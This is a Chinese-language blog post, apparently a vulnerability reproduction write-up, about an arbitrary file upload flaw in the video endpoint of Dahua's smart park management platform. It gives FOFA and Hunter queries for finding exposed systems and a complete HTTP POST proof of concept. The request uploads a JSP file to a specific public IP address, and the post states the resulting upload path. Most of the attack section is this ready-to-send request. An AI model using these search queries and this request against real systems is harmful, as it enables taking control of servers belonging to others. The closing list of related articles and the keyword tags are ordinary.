大华智慧园区综合管理平台 video 任意文件上传漏洞

漏洞描述

大华 智慧园区综合管理平台 video 接口存在任意文件上传漏洞，攻击者通过漏洞可以上传任意文件到服务器中，控制服务器权限

漏洞复现

fofa语句："/WPMS/asset/lib/gridster/"或app="dahua-智慧园区综合管理平台"
鹰图语句：web.body="/WPMS/asset/lib/gridster/"
登录页面如下：

POC：

POST /publishing/publishing/material/file/video HTTP/1.1
Host: 112.29.98.167:8009
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 804
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding: gzip, deflate
Connection: close

--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Filedata"; filename="Test.jsp"

Test
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Submit"

submit
--dd8f988919484abab3816881c55272a7--

上传文件后的路径：/publishingImg/VIDEO/230812152005170200.jsp

本栏目推荐文章
• C++实现文件内查找字符串
• IDEA项目名称后面出现中括号，模块Modules的名子和文件夹名称不同，可以右键修改名称也可以在File->Project Structure 修改Modules的Name(快捷键ctrl+Shift+Alt+s)
• 和利时MACS6通过dat文件实现任意时间范围与测点的历史数据提取与科研分析
• OFBiz RCE漏洞复现（CVE-2023-51467）
• 类模板分文件编写
• Linux文件IO之二 [补档-2023-07-21]
• Linux文件IO之一 [补偿-2023-07-21]
• 十行python代码实现文件去重，去除重复文件的脚本
• vim编辑器实现左边目录右边是文件内容
• MakeFile文件的使用 [补档-2023-07-13]

漏洞 园区 智慧 文件 video漏洞 园区 智慧 文件 漏洞 园区 智慧 密码 searchjson漏洞 园区 智慧 漏洞 园区 智慧 平台 智慧 开发者 园区 人物 灯杆 网关 园区 智慧 园区建设 园区 智慧 数字 园区 视频技术 工业园区 智慧 园区 智慧 智能 方案 园区 智慧 关键 数字